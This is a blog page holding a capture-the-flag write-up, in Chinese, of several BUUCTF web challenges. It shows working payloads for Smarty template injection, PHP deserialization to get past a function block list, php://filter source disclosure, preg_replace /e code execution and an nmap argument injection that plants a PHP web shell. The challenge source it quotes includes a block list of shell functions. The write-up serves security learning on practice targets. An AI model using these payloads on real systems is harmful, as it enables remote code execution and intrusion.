<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="odiws">





<title>buuctf4月29日 | Hexo</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 7.0.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Bentham&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Bentham&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">buuctf4月29日</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">odiws</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">April 28, 2024&nbsp;&nbsp;19:19:20</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/%E5%88%B7%E9%A2%98%E7%AC%94%E8%AE%B0/">刷题笔记</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="BJDCTF2020-The-mystery-of-ip"><a href="#BJDCTF2020-The-mystery-of-ip" class="headerlink" title="[BJDCTF2020]The mystery of ip"></a>[BJDCTF2020]The mystery of ip</h2><h3 id=""><a href="#" class="headerlink" title=""></a><img src="C:\Users\86182\assets\image-20240428191224568.png" alt="image-20240428191224568"></h3><p>Flag点进去看看，发现有个回显，是我的ip地址，着说明访问了我的ip地址，可以用伪造IP地址看看，这就想到用X-Forwarded-For，可以看到不管我们输入什么都会回显，盲猜</p>
<h3 id="ssti注入"><a href="#ssti注入" class="headerlink" title="ssti注入"></a>ssti注入</h3><h3 id="输入-config-看看配置，是smarty"><a href="#输入-config-看看配置，是smarty" class="headerlink" title="输入{config}看看配置，是smarty"></a>输入{config}看看配置，是smarty</h3><p><img src="C:\Users\86182\assets\image-20240428191821870.png" alt="image-20240428191821870"></p>
<h3 id="看看版本-smarty-version-，上网找它特点呗"><a href="#看看版本-smarty-version-，上网找它特点呗" class="headerlink" title="看看版本{$smarty.version}，上网找它特点呗"></a>看看版本{$smarty.version}，上网找它特点呗</h3><p><img src="C:\Users\86182\assets\image-20240428191846842.png" alt="image-20240428191846842"></p>
<h3 id="也就是if是配对用的if和-if，且if内可以运行php代码"><a href="#也就是if是配对用的if和-if，且if内可以运行php代码" class="headerlink" title="也就是if是配对用的if和&#x2F;if，且if内可以运行php代码"></a>也就是if是配对用的if和&#x2F;if，且if内可以运行php代码</h3><p>{if system(“ls”)}{&#x2F;if},这里的flag.php是假的，要查根目录下的<br>{if system(“ls &#x2F;”)}{&#x2F;if}</p>
<p>{if system(“cat &#x2F;flag”)}{&#x2F;if}<br>还有一种表达就是直接{system(“ls”)}</p>
<p><img src="C:\Users\86182\assets\image-20240428192441128.png" alt="image-20240428192441128"></p>
<h2 id="网鼎杯-2020-朱雀组-phpweb-1"><a href="#网鼎杯-2020-朱雀组-phpweb-1" class="headerlink" title="[网鼎杯 2020 朱雀组]phpweb 1"></a>[网鼎杯 2020 朱雀组]phpweb 1</h2><p>1、打开界面之后界面一直在刷新，检查源代码也未发现提示信息，但是在检查中发现了两个隐藏的属性：func和p，抓包进行查看一下，结果如下：</p>
<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830215742342-1296783573.png" alt="img"></p>
<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830215718355-978409354.png" alt="img"></p>
<p>2、对两个参数与返回值进行分析，我们使用dat时一般是这种格式：date(“Y-m-d+h:i:s+a”)，那我们可以猜测func参数接受的是一个函数，p参数接受的是函数执行的内容，我们可以输入参数md5和1进行测试，结果如下：</p>
<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830220636777-1328039962.png" alt="img"></p>
<p>3、那我们就尝试读取下当前的目录信息，payload：func&#x3D;system&amp;p&#x3D;ls，显示hacking，应该是被过滤掉了，因此我们考虑读取下源码信息，payload：func&#x3D;file_get_contents&amp;p&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;index.php，对获得的字母串进行base64解码，结果如下：</p>
<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830221155809-130862302.png" alt="img"></p>
<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830220820620-1733656961.png" alt="img"></p>
<p>源码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $disable_fun = array(<span class="string">&quot;exec&quot;</span>,<span class="string">&quot;shell_exec&quot;</span>,<span class="string">&quot;system&quot;</span>,<span class="string">&quot;passthru&quot;</span>,<span class="string">&quot;proc_open&quot;</span>,<span class="string">&quot;show_source&quot;</span>,<span class="string">&quot;phpinfo&quot;</span>,<span class="string">&quot;popen&quot;</span>,<span class="string">&quot;dl&quot;</span>,<span class="string">&quot;eval&quot;</span>,<span class="string">&quot;proc_terminate&quot;</span>,<span class="string">&quot;touch&quot;</span>,<span class="string">&quot;escapeshellcmd&quot;</span>,<span class="string">&quot;escapeshellarg&quot;</span>,<span class="string">&quot;assert&quot;</span>,<span class="string">&quot;substr_replace&quot;</span>,<span class="string">&quot;call_user_func_array&quot;</span>,<span class="string">&quot;call_user_func&quot;</span>,<span class="string">&quot;array_filter&quot;</span>, <span class="string">&quot;array_walk&quot;</span>,  <span class="string">&quot;array_map&quot;</span>,<span class="string">&quot;registregister_shutdown_function&quot;</span>,<span class="string">&quot;register_tick_function&quot;</span>,<span class="string">&quot;filter_var&quot;</span>, <span class="string">&quot;filter_var_array&quot;</span>, <span class="string">&quot;uasort&quot;</span>, <span class="string">&quot;uksort&quot;</span>, <span class="string">&quot;array_reduce&quot;</span>,<span class="string">&quot;array_walk&quot;</span>, <span class="string">&quot;array_walk_recursive&quot;</span>,<span class="string">&quot;pcntl_exec&quot;</span>,<span class="string">&quot;fopen&quot;</span>,<span class="string">&quot;fwrite&quot;</span>,<span class="string">&quot;file_put_contents&quot;</span>);</span><br><span class="line">    function gettime($func, $p) &#123;</span><br><span class="line">        $result = call_user_func($func, $p);</span><br><span class="line">        $a= gettype($result);</span><br><span class="line">        <span class="keyword">if</span> ($a == <span class="string">&quot;string&quot;</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> $result;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;<span class="keyword">return</span> <span class="string">&quot;&quot;</span>;&#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">class</span> <span class="title class_">Test</span> &#123;</span><br><span class="line">        var $p = <span class="string">&quot;Y-m-d h:i:s a&quot;</span>;</span><br><span class="line">        var $func = <span class="string">&quot;date&quot;</span>;</span><br><span class="line">        function __destruct() &#123;</span><br><span class="line">            <span class="keyword">if</span> ($this-&gt;func != <span class="string">&quot;&quot;</span>) &#123;</span><br><span class="line">                echo gettime($this-&gt;func, $this-&gt;p);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    $func = $_REQUEST[<span class="string">&quot;func&quot;</span>];</span><br><span class="line">    $p = $_REQUEST[<span class="string">&quot;p&quot;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> ($func != null) &#123;</span><br><span class="line">        $func = strtolower($func);</span><br><span class="line">        <span class="keyword">if</span> (!in_array($func,$disable_fun)) &#123;</span><br><span class="line">            echo gettime($func, $p);</span><br><span class="line">        &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">            die(<span class="string">&quot;Hacker...&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>4、在代码里注意到了__destruct()函数，此函数会在类被销毁时调用，那我们如果反序列化一个类，在类里的参数中写上我们要执行的代码和函数，这样的话就会直接调用gettime函数，而不会执行in_array($func,$disable_fun)，那我们就绕过了黑名单的判断，payload：func&#x3D;unserialize&amp;p&#x3D;O:4:”Test”:2:{s:1:”p”;s:2:”ls”;s:4:”func”;s:6:”system”;} ，结果如下：</p>
<p>序列化代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Test</span> &#123;</span><br><span class="line">    var $p = <span class="string">&quot;ls&quot;</span>;</span><br><span class="line">    var $func = <span class="string">&quot;system&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">$test = new Test();</span><br><span class="line">$<span class="built_in">str</span> = serialize($test);</span><br><span class="line"><span class="built_in">print</span>($<span class="built_in">str</span>);</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830223439037-1159865422.png" alt="img"></p>
<p>5、成功绕过黑名单获取到当前的目录信息，那我们就修改下传递的参数，查找下flag的位置信息，payload：func&#x3D;unserialize&amp;p&#x3D;O:4:”Test”:2:{s:1:”p”;s:18:”find+&#x2F;+-name+flag*”;s:4:”func”;s:6:”system”;} ，结果如下：</p>
<p>序列化代码(序列化之后注意将空格修改为+号，或者采用get方式进行传输）：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Test</span> &#123;</span><br><span class="line">    var $p = <span class="string">&quot;find / -name flag*&quot;</span>;</span><br><span class="line">    var $func = <span class="string">&quot;system&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">$test = new Test();</span><br><span class="line">$<span class="built_in">str</span> = serialize($test);</span><br><span class="line"><span class="built_in">print</span>($<span class="built_in">str</span>);</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830224529466-34088818.png" alt="img"></p>
<p>6、获得flag文件位置信息后，修改传递的参数读取下flag值，payload：func&#x3D;unserialize&amp;p&#x3D;O:4:”Test”:2:{s:1:”p”;s:22:”cat+&#x2F;tmp&#x2F;flagoefiu4r93”;s:4:”func”;s:6:”system”;} ，结果如下：</p>
<p>序列化代码如下(序列化之后注意将空格修改为+号，或者采用get方式进行传输）：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Test</span> &#123;</span><br><span class="line">    var $p = <span class="string">&quot;cat /tmp/flagoefiu4r93&quot;</span>;</span><br><span class="line">    var $func = <span class="string">&quot;system&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">$test = new Test();</span><br><span class="line">$<span class="built_in">str</span> = serialize($test);</span><br><span class="line"><span class="built_in">print</span>($<span class="built_in">str</span>);</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830224934681-1304625878.png" alt="img"></p>
<p>7、这里补充下另外一种绕过黑名单的方式，第三步中的读取目录信息，可以修改payload：func&#x3D;\system&amp;p&#x3D;ls，也可以获得目录信息，结果如下;</p>
<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830225414092-411832528.png" alt="img"></p>
<p>8、然后后面的就是查找flag文件的位置、读取flag信息，结果如下：</p>
<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830230045055-616538494.png" alt="img"></p>
<p><img src="https://img2022.cnblogs.com/blog/2834847/202208/2834847-20220830225915975-872445652.png" alt="img"></p>
<p>9、\system可以绕过黑名单的原因：php内的” \ “在做代码执行的时候，会识别特殊字符串。</p>
<h2 id="BSidesCF-2020-Had-a-bad-day"><a href="#BSidesCF-2020-Had-a-bad-day" class="headerlink" title="[BSidesCF 2020]Had a bad day"></a>[BSidesCF 2020]Had a bad day</h2><p><img src="C:\Users\86182\assets\image-20240428194718770.png" alt="image-20240428194718770"></p>
<p>抓包发现是get的请求有个注入点，可以进行修改，但是发现只能写含有woofers and meowers的单词</p>
<p><img src="C:\Users\86182\assets\image-20240428194915353.png" alt="image-20240428194915353"></p>
<p>再次写woofers.php试试</p>
<p><img src="C:\Users\86182\assets\image-20240428195136220.png" alt="image-20240428195136220"></p>
<p>发现php双写了，就可以确定加了一个.php文件</p>
<p>后缀有.php的可以想到php伪协议php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resourse&#x3D;index.php(这次将后缀删掉)</p>
<p>获取源码：</p>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="Images that spark joy">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <title>Had a bad day?</title>
    <link rel="stylesheet" href="css/material.min.css">
    <link rel="stylesheet" href="css/style.css">
  </head>
  <body>
    <div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100">
      <header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800">
        <div class="mdl-layout__header-row">
          <span class="mdl-layout-title">Had a bad day?</span>
          <div class="mdl-layout-spacer"></div>
        <div>
      </header>
      <div class="page-ribbon"></div>
      <main class="page-main mdl-layout__content">
        <div class="page-container mdl-grid">
          <div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div>
          <div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col">
            <div class="page-crumbs mdl-color-text--grey-500">
            </div>
            <h3>Cheer up!</h3>
              <p>
                Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
              </p>
              <div class="page-include">
              <?php
                $file = $_GET['category'];

<pre><code>            if(isset($file))
            &#123;
                if( strpos( $file, &quot;woofers&quot; ) !==  false || strpos( $file, &quot;meowers&quot; ) !==  false || strpos( $file, &quot;index&quot;))&#123;
                    include ($file . &#39;.php&#39;);
                &#125;
                else&#123;
                    echo &quot;Sorry, we currently only support woofers and meowers.&quot;;
                &#125;
            &#125;
            ?&gt;
        &lt;/div&gt;
      &lt;form action=&quot;index.php&quot; method=&quot;get&quot; id=&quot;choice&quot;&gt;
          &lt;center&gt;&lt;button onclick=&quot;document.getElementById(&#39;choice&#39;).submit();&quot; name=&quot;category&quot; value=&quot;woofers&quot; class=&quot;mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect&quot; data-upgraded=&quot;,MaterialButton,MaterialRipple&quot;&gt;Woofers&lt;span class=&quot;mdl-button__ripple-container&quot;&gt;&lt;span class=&quot;mdl-ripple is-animating&quot; style=&quot;width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/button&gt;
          &lt;button onclick=&quot;document.getElementById(&#39;choice&#39;).submit();&quot; name=&quot;category&quot; value=&quot;meowers&quot; class=&quot;mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect&quot; data-upgraded=&quot;,MaterialButton,MaterialRipple&quot;&gt;Meowers&lt;span class=&quot;mdl-button__ripple-container&quot;&gt;&lt;span class=&quot;mdl-ripple is-animating&quot; style=&quot;width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/button&gt;&lt;/center&gt;
      &lt;/form&gt;

      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/main&gt;
&lt;/div&gt;
&lt;script src=&quot;js/material.min.js&quot;&gt;&lt;/script&gt;
</code></pre>
  </body>
</html>

<h3 id="php伪协议添加一个必须要的单词不会影响正常的包含"><a href="#php伪协议添加一个必须要的单词不会影响正常的包含" class="headerlink" title="php伪协议添加一个必须要的单词不会影响正常的包含"></a>php伪协议添加一个必须要的单词不会影响正常的包含</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter/read=convert.base64-encode/woofers/resource=index</span><br></pre></td></tr></table></figure>

<p>这样提交的参数既包含有woofers这个字符串，也不会影响正常的包含，得到Flag.php：</p>
<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/1212355/202003/1212355-20200326212959322-1950812728.png"><img src="https://img2020.cnblogs.com/blog/1212355/202003/1212355-20200326212959322-1950812728.png" alt="img"></a></p>
<p>解码得到Flag：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- Can you read this flag? --&gt;</span><br><span class="line">&lt;?php</span><br><span class="line"> // flag&#123;a4aaba40-84f9-4b7a-b269-d025b03676a1&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="BJDCTF2020-ZJCTF，不过如此"><a href="#BJDCTF2020-ZJCTF，不过如此" class="headerlink" title="[BJDCTF2020]ZJCTF，不过如此"></a>[BJDCTF2020]ZJCTF，不过如此</h2><p>4月27日的题目[ZJCTF 2019]NiZhuanSiWei</p>
<p>第二个PHP伪协议</p>
<p>所有的</p>
<p>?text&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,I have a dream&amp;file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;next.php</p>
<p>解码后的代码</p>
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

这里的漏洞出在**preg_replace** **/e** 模式下

e模式下的preg_replace可以让第二个参数'替换字符串'当作代码执行，但是这里第二个参数是不可变的，但因为有这种特殊的情况，正则表达式模式或部分模式两边添加圆括号会将相关匹配存储到一个临时缓存区，并且从1开始排序，而strtolower("\1")正好表达的就是匹配区的第一个（\\1=\1），从而我们如果匹配可以，则可以将函数实现。
比如我们传入 ?.*=**{${phpinfo()}}**

原句：preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str); 就变成preg_replace('/(' .* ')/ei','strtolower("\\1")',**{${phpinfo()}}**);

又因为$_GET传入首字母是非法字符时候会把  .（点号）改成下划线，因此得将\.*换成\s*

所有payload：?\S*=${getFlag()}&cmd=system('ls /'); 

![img](https://img2022.cnblogs.com/blog/2729166/202206/2729166-20220627134114716-1034484069.png)

 



 终于看到了flag，然后将cmd里改成cat /flag即可

?\S*=${getFlag()}&cmd=system('cat /flag'); 

![img](https://img2022.cnblogs.com/blog/2729166/202206/2729166-20220627134226627-1152733174.png)

## [BUUCTF 2018]Online Tool

![image-20240428210310186](C:\Users\86182\assets\image-20240428210310186.png)



nmap -T5 -sT -Pn --host-timeout 2 -F host -T<0-5> : 速度/时间模板参数，指定了扫描的速度。 -sT : 使用TCP进行扫描。 -Pn : 将所有主机视为在在线，跳过主机发现。 --host-timeout : 设置超时时间。设置为2秒，即如果目标主机在2秒内没有响应，Nmap将放弃该主机的扫描。 -F : 进行快速扫描，用于快速识别目标主机上开放的常见端口，而不扫描所有的端口。

> escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数
> 功能 ：`escapeshellarg()` 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，
> 这样以确保能够直接将一个字符串传入 shell 函数，shell 函数包含 `exec()`, `system()` 执行运算符(反引号)

> escapeshellcmd — shell 元字符转义
> 功能：`escapeshellcmd()` 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。
> 此函数保证用户输入的数据在传送到 `exec()` 或 `system()` 函数，或者 执行操作符 之前进行转义。
>
> 反斜线（\）会在以下字符之前插入：
> &#;`|?~<>^()[]{}$*, \x0A 和 \xFF*。 *’ 和 “ 仅在不配对儿的时候被转义。
> 在 Windows 平台上，所有这些字符以及 % 和 ! 字符都会被空格代替。

构建payload：`?host=' <?php eval($_POST["hack"]);?><p> -oG hack.php ‘&#96;</p>
<p><img src="C:\Users\86182\assets\image-20240428210330513.png" alt="image-20240428210330513"></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>odiws</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://odiws.github.io/2024/04/28/buuctf4%E6%9C%8829%E6%97%A5/">http://odiws.github.io/2024/04/28/buuctf4%E6%9C%8829%E6%97%A5/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/buuctf/"># buuctf</a>
                    
                        <a href="/tags/ctf/"># ctf</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2024/04/28/buuctf%204%E6%9C%8828%E6%97%A5/"></a>
            
            
            <a class="next" rel="next" href="/2024/04/27/buuctf%204%E6%9C%8827%E6%97%A5/">buuctf4月27日</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© odiws | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>